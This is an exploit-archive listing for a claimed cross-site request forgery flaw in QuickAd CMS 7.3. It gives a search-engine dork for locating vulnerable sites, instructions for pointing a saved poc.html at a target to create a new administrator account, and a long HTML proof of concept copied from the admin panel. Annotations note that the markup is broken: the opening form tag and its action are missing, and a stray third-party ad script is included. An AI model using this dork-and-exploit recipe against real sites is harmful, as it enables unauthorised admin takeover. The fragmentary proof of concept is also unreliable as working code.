## https://sploitus.com/exploit?id=PACKETSTORM:172931
====================================================================================================================================  
| # Title : QUICKAD CMS 7.3 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |   
| # Vendor : https://codecanyon.net/item/quickad-classified-ads-php-script/19960675?s_rank=189 |   
| # Dork : "Bylancer, All right reserved" |  
====================================================================================================================================  
  
poc :  
  
  
[+] Dorking in Google or other search engine.  
  
[+] The following HTML code creates a new admin .  
  
[+] Go to the line 61.  
  
[+] Set the target site link, save changes and apply .   
  
[+] affected file : /admin/panel/admin_add.php .   
  
[+] http://127.0.0.1/q7.3/admin/panel/admin_add.php .  
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<!--
  Listing published with the advisory as poc.html. It is markup for an
  "Admin users" page plus add-admin form fields, with asset URLs pointing at a
  127.0.0.1 lab host under /classified.bylancer.com/admin/.
  NOTE(review): the markup is unbalanced. html, body, the drawer aside and
  several div elements are opened and never closed, and the closing form tag
  near the end has no opening tag, so this is a fragment rather than a
  complete document.
  NOTE(review): opening the file triggers requests to third-party hosts
  (fonts.googleapis.com, pagead2.googlesyndication.com); analyse it only in an
  isolated environment.
-->
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">  
  
<!-- Google fonts -->  
<!-- Protocol-relative URL: the scheme is inherited from however this file is opened. -->
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Roboto:300,400,400italic,500,900%7CRoboto+Slab:300,400%7CRoboto+Mono:400" />  
  
<!-- Page JS Plugins CSS -->  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick.min.css" />  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick-theme.min.css" />  
<!-- css select2 -->  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2.min.css" />  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2-bootstrap.css" />  
<!-- Zeunix CSS stylesheets -->  
<link rel="stylesheet" id="css-font-awesome" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/font-awesome.css" />  
<link rel="stylesheet" id="css-ionicons" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/ionicons.css" />  
<link rel="stylesheet" id="css-bootstrap" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/bootstrap.css" />  
<link rel="stylesheet" id="css-app" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app.css" />  
<link rel="stylesheet" id="css-app-custom" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app-custom.css" />  
<link rel="stylesheet" id="css-app-animation" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/animation.css" />  
<!-- End Stylesheets -->  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/category.css" />  
  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/asscrollable/asScrollable.min.css">  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slidepanel/slidePanel.min.css">  
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/datatables/jquery.dataTables.min.css" />  
  
  
<!--alerts CSS -->  
<link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/sweetalert/sweetalert.css" rel="stylesheet" type="text/css">  
<link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/alertify/alertify.min.css" rel="stylesheet" type="text/css">  
  
<!--
  Sets one global holding the ajax_sidepanel.php URL. No script in this listing
  reads it; presumably the panel's own scripts (not included here) do. TODO confirm.
-->
<script>  
var sidepanel_ajaxurl = 'https://127.0.0.1/classified.bylancer.com/admin/ajax_sidepanel.php';  
</script>  
</head>  
  
<body class="app-ui layout-has-drawer layout-has-fixed-header">  
  
<div class="app-layout-canvas">  
<div class="app-layout-container">  
  
  
<!-- NOTE(review): this aside and the two div elements inside it are never closed; main below ends up nested in them. -->
<aside class="app-layout-drawer">  
  
<!-- Drawer scroll area -->  
<div class="app-layout-drawer-scroll">  
<!-- Drawer logo -->  
<div id="logo" class="drawer-header">  
  
  
<main class="app-layout-content">  
  
<!-- Page Content -->  
<div class="container-fluid p-y-md">  
<!-- Partial Table -->  
<div class="card">  
<div class="card-header">  
<h4>Admin users</h4>  
<div class="pull-right">  
<!-- data-url names admin_add.php, the file the advisory lists as affected. The href is only "#". -->
<a href="#" data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" class="btn btn-success waves-effect waves-light m-r-10">Add Admin User</a>  
</div>  
</div>  
<div class="card-block">  
<div id="js-table-list">  
<!-- Table shell only: tbody is empty and data-jsonfile points at admins.php; nothing in this listing loads the rows. -->
<table id="ajax_datatable" data-jsonfile="https://127.0.0.1/classified.bylancer.com/admin/admins.php" class="js-table-checkable table table-vcenter table-hover" data-tablesaw-mode="stack" data-plugin="animateList" data-animate="fade" data-child="tr" data-selectable="selectable">  
<thead>  
<tr>  
<th class="text-center w-5 sortingNone">  
<label class="css-input css-checkbox css-checkbox-default m-t-0 m-b-0">  
<input type="checkbox" id="check-all" name="check-all"><span></span>  
</label>  
</th>  
<th><i class="ion-image"></i> Admin user</th>  
<th class="w-10">Email</th>  
<th style="width: 60px;">Actions</th>  
</tr>  
</thead>  
<tbody id="ajax-services">  
  
</tbody>  
</table>  
  
</div>  
  
  
</div>  
<!-- .card-block -->  
</div>  
<!-- .card -->  
<!-- End Partial Table -->  
  
</div>  
<!-- .container-fluid -->  
<!-- End Page Content -->  
  
</main>  
<!--
  Third-party ad loader carrying a publisher id. It is fetched and executed when
  this file is opened with network access.
  NOTE(review): the advisory does not explain why it is present; treat it as
  untrusted script that is unrelated to the admin form.
-->
<script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>  
<!-- First copy of the site-action block; an identical copy follows below. -->
<div class="site-action">  
<button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button>  
<button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating">  
<i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i>  
<i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i>  
</button>  
<div class="site-action-buttons">  
<button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"  
class="btn-raised btn btn-danger btn-floating animation-slide-bottom">  
<i class="icon ion-android-delete" aria-hidden="true"></i>  
</button>  
</div>  
</div>  
  
<div class="col-md-12">  
<!-- Site Action -->  
<!-- NOTE(review): second copy of the block above; id="slidepanel-show" is therefore used twice in one document. -->
<div class="site-action">  
<button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button>  
<button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating">  
<i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i>  
<i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i>  
</button>  
<div class="site-action-buttons">  
<button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"  
class="btn-raised btn btn-danger btn-floating animation-slide-bottom">  
<i class="icon ion-android-delete" aria-hidden="true"></i>  
</button>  
</div>  
</div>  
  
<!--
  Add-admin form controls. The named inputs shown are name, username, email and
  password. No hidden anti-CSRF token input appears among them, which is
  consistent with the advisory's CSRF claim; because the form's opening tag is
  missing from this listing, the complete set of submitted fields cannot be
  confirmed from here.
  Defensive reading: an endpoint that creates administrator accounts should
  require an unpredictable per-session token, verify the Origin or Referer
  header, use SameSite session cookies and re-authenticate the acting admin.
-->
<div class="form-group">  
<label for="exampleInputfullname">Full Name<code></code></label>  
<div class="input-group">  
<div class="input-group-addon"><i class="ion-person"></i></div>  
<input type="text" class="form-control" id="exampleInputfullname" placeholder="Full Name" name="name" required="">  
<span class="help-block"></span>  
</div>  
</div>  
</div>  
  
<h4 class="box-title">User Login Details</h4>  
<hr>  
<div class="col-md-12">  
<div class="form-group">  
<label for="exampleInputuname">Username<code>*</code></label>  
<div class="input-group">  
<div class="input-group-addon"><i class="ion-person"></i></div>  
<input type="text" class="form-control" id="exampleInputuname" placeholder="Username" name="username" required="">  
</div>  
</div>  
</div>  
  
<div class="col-md-12">  
<div class="form-group">  
<label for="exampleInputEmail1">Email address<code></code></label>  
<div class="input-group">  
<div class="input-group-addon"><i class="ion-android-mail"></i></div>  
<input type="email" class="form-control" id="exampleInputEmail1" placeholder="Email" name="email" required="">  
</div>  
</div>  
</div>  
<div class="col-md-12">  
<div class="form-group">  
<label for="exampleInputpwd1">Password<code></code></label>  
<div class="input-group">  
<div class="input-group-addon"><i class="ion-android-lock"></i></div>  
<input type="password" class="form-control" id="exampleInputpwd1" placeholder="Login Password" name="password" required="">  
</div>  
</div>  
</div>  
</div>  
  
<div class="row">  
  
</div>  
  
  
  
</div>  
  
<!-- NOTE(review): closing tag with no matching opening form tag in this listing, so no action URL or method is shown. -->
</form>  
</div>  
</div>  
</div>  
<!-- /.row -->  
</div>  
</div>  
  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |   
=======================================================================================================================================